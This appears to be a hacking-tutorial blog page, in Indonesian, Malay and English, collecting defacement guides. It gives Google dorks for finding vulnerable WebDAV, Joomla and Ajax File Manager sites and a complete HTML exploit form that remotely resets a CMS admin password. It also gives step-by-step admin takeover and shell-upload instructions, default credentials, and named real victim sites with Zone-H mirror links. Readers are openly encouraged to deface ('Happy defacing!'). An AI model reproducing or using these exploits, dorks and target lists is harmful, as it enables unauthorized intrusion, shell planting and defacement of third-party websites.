Showing posts with label TUTORIAL HACK. Show all posts
Showing posts with label TUTORIAL HACK. Show all posts

Home » Posts filed under TUTORIAL HACK

Cara mencari Website Vuln Webdav [NEW]

Sekarang akan kita bahas tentang cara mencari web yang webdav vulnerability, caranya sangat mudah seperti biasa kita gunakan Google Dork untuk mencari web target. Ini dia Dork Webdav yang bisa kita coba:



  • intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache”
  • intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:edu
  • intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:gov
  • intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:YOURCOUNTRY (misal: my, us, th. dll)
  • inurl:webdav
  • inurl:.com.x/*.asp
  • inurl:.edu.x/*.asp
  • inurl:.gov.x/*.asp
  • inurl:.net.x/*.asp
  • inurl:.org.x/*.asp
Ganti tulisan x dengan domain negara ( contoh inurl:org.co.il/*.asp ) 
Kita cari web target dengan memasukan Dork diatas kedalam pencarian Google, jika sudah keluar hasil penelusuranya kita tinggal pilih target dari hasil yang sudah ditampilkan google tadi. Caranya pada alamat url web target kita ketikan kata /webdav. Contoh: http://www.WEBTARGET.com/webdav
Jika muncul halaman yang bertuliskan “WebDAV testpage”, berarti web tersebut dapat kita hack.
Contoh: 
Namun biar pun muncul tulisan WebDAV testpage tetapi saja Not vulnerable dav, itu berarti sudah di patch oleh admin. Tindakan selanjutnya cari target lain.

NB : Jika belum dapat juga targetnya lebih baik cari di website tempat submit ( seperti Zone-H | Hack-DB | Hack-Mirror dan Lain - Lain ) lalu cari yang OSnya Windows 2003 biasanya web itu vuln untuk webdav 




FREE MONTHLY WEBSITES 2.0 ADMINISTRATOR REMOTE PASSWORD CHANGE


Deface website dengan remote password change

Assalamualaikum dan salam sejahtera.Hari ni aku nak ajar exploit baru iaituremote administrator password change.Benda apa ni?
Exploit ni boleh tukar password dan username pada website yang terdedah secara remote.

Ok jom mula.

1. Mula-mula jadi laman sasaran dengan menggunakan salah satu google dork dibawah :

inurl:/index_ebay.php
"Powered by: Resell Rights Fortune"
Powered By: Free Monthly Websites 2.0

2. Copy script dibawah :

Tukar http://www.target.com/ kepada link laman sasaran yang korang dapat tadi.


<html>

        <head><title>Free Monthly Websites 2.0 | Remote Admin password Change</title></head>
    <body>
            <td width="645" align="center" valign="top"><table width="645" border="0" align="center" cellpadding="0" cellspacing="0">
            <form name="frm" action="http://www.target.com/admin/file_io.php" method="post" onSubmit="return chk()">
            <input type="hidden" name="do_type" value="admin_settings_write">
        <tr>
            <td height="100" colspan="2" align="center" valign="middle">
            <font color="#808080"><b><font size="5">Free Monthly Websites 2.0 |</font><font size="6"> </font></b> <font size="4">Remote Admin password Change</font></font></td>
        </tr>
        <tr>
            <td width="300" height="50" align="center" valign="middle">
            <font color="#808080">New Username:</font>
            </td>
            <td width="345" height="50" align="left" valign="middle"><input name="user_name" type="text" size="40">  </td>
        </tr>
            </td>
        <tr>
            <td width="300" height="62" align="center" valign="middle">
            <font color="#808080">New Password: </font> </td>
            <td width="345" height="62" align="left" valign="middle"><input name="password" type="text" size="40">  </td>
        </tr>
        <tr>
            <td height="50" colspan="2" align="center" valign="middle" ><p>
            <input type="submit" name="Submit" value="Save" style="font-weight: 700"><br>
            </td>
        </tr>
        <tr>
            <td height="50" colspan="2" align="center" valign="middle" class="main2"><p>Author<b> : </b>
                <a href="http://www.y-aboukir.info/" style="text-decoration: none">
                <font color="#000000">Yassin ABOUKIR</font></a></p></td>
        </tr>
    </body>
<html>




Save sebagai exploit.html .

3. Selepas itu, buka script yang korang save tadi dalam browser korang. (right click > open with > browser)


Isikan kotak New Username dan New Password dengan apa2 yang korang suka.Username dan Password yang korang isi ni akan digunakan untuk login di website sasaran korang.

Selepas dah isi, click Save dan kalau berjaya korang akan di redirect ke login page website sasaran korang tadi :D



Apa yang korang perlu buat seterusnya ialah Login dengan username dan password yang korang buat tadi!

Kalau tak berjaya, akan keluar :
The file settings/admin_settings.txt is not writable

Lepas dah berjaya login, korang boleh la deface :D

Ni contoh website yang aku dapat :

http://www.jerry-lyons.com/page.php?id=Top_Reasons.html
http://zone-h.org/mirror/id/19689275

http://www.windowmagic.co/
http://zone-h.org/mirror/id/19689294

Korang boleh la mencuba dengan website2 ni.Happy defacing!




CARA INSTALL METASPLOIT FRAMEWORK DI WINDOWS



Assalamualaikum dan salam sejahtera.Entry ni aku nak ajar cara nak installMetasploit Framework di windows. tak tau apa itu metasploit? google :P

Ok jom mula....

1. Mula-mula download Metasploit For Windows di laman web metasploit : http://www.metasploit.com/download/

2. Lepas dah download, cari installer metasploit tu dan Right Click > Run as Administrator



3. Lepas tu akan keluar installer metasploit.



Tekan Next.

4. Selepas tu Accept Agreement dan click Next.




5. Kemudian pilih lokasi nak install.(biarkan ja default)
lepas tu click Next.


6. Kemudian keluar suruh set port.biar macam asal.Lepas tu click Next


7. Buat SSL pulak. 
Server-Name biar mcm asal atau letak nama apa2..
Validity buat mcm dalam gambar.click Next.




8. Set Automatic Updates YES.ni untuk update metasploit korang.klik next.



9. Ok sekarang dah sedia untuk install.Click Next.



10. Kemudian Metasploit akan start install.Biar ja dia install jangan buat apa2.Install dia ni lama sikit.


11. Kalau korang ada guna antivirus, pastikan korang tutup dulu untuk elak dari ganggu proses install metasploit.



12. Siap install!
Tekan Finish.



13. Untuk run Metasploit, click Start > Run dan tulis "console" .Klik pada Metasploit Console




14. Boom! Ni lah rupa Metasploit Framework yang korang dah install tu.


Ok dah siap nak buat apa? Enjoy! :D




Cara Deface Dengan Teknik Exploit Joomla




Assalamualaikum....

ehm,, jumpa lagi nih dengan coretan2 semerawut ane tapi ngangenin untuk dibaca,, wkkwkwk yo dah, dah pasti pada ga sabar kan udah nunggu dari kemaren?? wkwkwk langsung daaahh :p

Silahkan tutorial ini di baca dulu baik2, dipahami dan dipelajari, baru dah sobat praktekin :p kalo seandainya gagal, itu karena website udah di patch :p

"Talk Less Do More!" :p

oke dah simak nih! sebelumnya download dulu bahan2nya :p

1. Download : Exploit Joomla.html    Password: idca

2. Titip Nama : Indonesian Cyber Army 

Langkah Langkah::

1. Cari web target di Google.com dengan memasukkan Dork berikut:

intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com

#Dork Kembangin Sendiri :p

2. Pilih target sobat, lalu masukin exploit berikut:

index.php?option=com_users&view=registration

3. Ane disini mengambil contoh:

http://mobile.resto-lincontournable.com/index.php/utiliser-joomla/utiliser-extensions/composants/composant-flux-rss/un-flux-rss

4. kemudian ane ganti menjadi:

http://mobile.resto-lincontournable.com/index.php?option=com_users&view=registration


5. Setelah itu klik kanan>klik View Page Source atau bisa juga tekan tombol keyboard CTRL+U

kalo sudah muncul page sourcenya, lalu tekan tombol CTRL+F atau klik menu Find ketik hidden. cari seperti kode berikut:


6. Copy kode tersebut, lalu buka Exploit Joomla.html yang udah sobat download tadi dengan Notepad, lalu pastekan kode tersebut, dan masukkan juga site target dan Email sobat! liat gambar !


7. Lalu Save! Setelah itu buka file Exploit Joomla.html nya, Klik Register!

8. Setelah itu akan muncul peringatan bahwa password harus diisi sama! Masukkan password sobat!


9. Setelah password diisi, klik Register! lalu buka email sobat dan klik link Konfirmasinya!







10. Lalu masuk kehalaman admin login nya! 

http://mobile.resto-lincontournable.com/administrator

11. Masukkan Username & Passwordnya! lalu klik Login! kalo contoh disini:

Username:genesis
Password:onix

Tararaaaaaaaaaaaaaa!! Sobat masuk sebagai admin! trus tebas deh index nya :p Liat Cara Tebas Index

Goodluck!!! :p




Ajax File Manager ~ Shell and Files Upload Vulnerability


372186_100002061928187_1094618549_n.jpg (180×178)
Open Google Search Engine, Type this dork :inurl:/plugins/ajaxfilemanager/
For Example I got : 
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/
 or http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/
or any site else ...
Now Put  ajaxfilemanager/ajaxfilemanager.php after /plugins/ in url 


for example : 
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php


Now Find Upload Upload and Upload Your shell/Deface/file


To view you File find /Uploaded/ directory in Website by using your brain :P


example of uploaded file : http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/aaaaaaaa.txt
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/aaaaaaaa.txt


Some Demo sites


http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://www.thebradshawscornershop.co.uk/scripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://202.137.23.162/brantas_portal/assets/tinymce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php


Results : 
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/yourfilehere
http://www.thebradshawscornershop.co.uk/images/yourfilehere
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere
http://202.137.23.162/brantas_portal/uploaded_docimage/yourfilehere
http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere


if you need Login in any ajaxfilemanager 


Default Password Ajax File Manager
Username:ajax
Password:123456